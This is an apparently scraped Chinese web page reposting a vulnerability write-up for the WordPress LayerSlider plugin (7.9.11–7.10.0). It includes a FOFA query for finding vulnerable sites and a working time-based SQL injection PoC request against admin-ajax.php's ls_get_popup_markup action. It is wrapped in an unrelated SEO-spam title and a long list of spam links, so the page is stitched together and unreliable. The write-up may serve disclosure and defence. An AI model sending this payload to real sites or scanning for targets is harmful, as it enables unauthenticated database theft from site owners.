当前位置: 首页 > news >正文

自己做的网站在浏览器上显示不安全吗利尔化学股票股吧

自己做的网站在浏览器上显示不安全吗,利尔化学股票股吧,wordpress friday,网站定制化开发0x01 产品简介 WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。 0x02 漏洞概述 WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),…

0x01 产品简介

WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。

0x02 漏洞概述

WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过 ls_get_popup_markup 操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。

0x03 影响范围

LayerSlider插件版本7.9.11 – 7.10.0

0x04 复现环境

FOFA:body="/wp-content/plugins/LayerSlider/"

0x05 漏洞复现

PoC

GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.
http://www.ho-use.cn/article/3281.html

相关文章:

  • 服务器 网站建设企业邮箱怎么注册
  • 公司网站介绍模板 htmlseo是什么职业岗位
  • 网站开发哪家公司好阿里大数据平台
  • 苏州专业网站seo推广安卓手机优化
  • 通用精品课程网站建设的需求分析河北seo基础教程
  • 东莞专业网站建设海外推广营销系统
  • 如何查询网站建设者百度通用网址
  • 做企业网站需要买什么资料网络营销评价的名词解释
  • 西安哪个公司网站建设好代运营一般收费
  • Java除了做网站开发哈能做啥百度自动点击器
  • 腾讯网站建设公司百度推广工具有哪些
  • 网站建设自主建设制作网站的网址
  • 网站 运营 外包 每个月多少钱怎么网上推广自己的产品
  • 阿里妈妈 该网站的域名已经被其他人绑定国际新闻界
  • 用html做网站源代码seo也成搜索引擎优化
  • 网站建设选择什么模式山西网页制作
  • 天津小型企业网站设计方案朝阳seo建站
  • 漫画网站模板网站排名优化软件
  • 网站地图在哪里展现企业网络营销方案设计
  • 电子商务网站的开发流程包括seo优缺点
  • 杭州赛虎网站建设百度快速提交入口
  • 娄底网站开发怎么做电商新手入门
  • 保定市工程造价信息网广州百度推广优化排名
  • 公司网站需要备案吗如何免费制作自己的网站
  • 微信开发者平台apiseo优化与sem推广有什么关系
  • 专门做兼职的网站河北优化seo
  • 云南省建设厅网站处长经典广告
  • 江苏最新消息今天惠州seo外包公司
  • 天津市政府网站建设管理办法哪个平台做推广效果好
  • 商城网站建设公司百度免费发布信息网站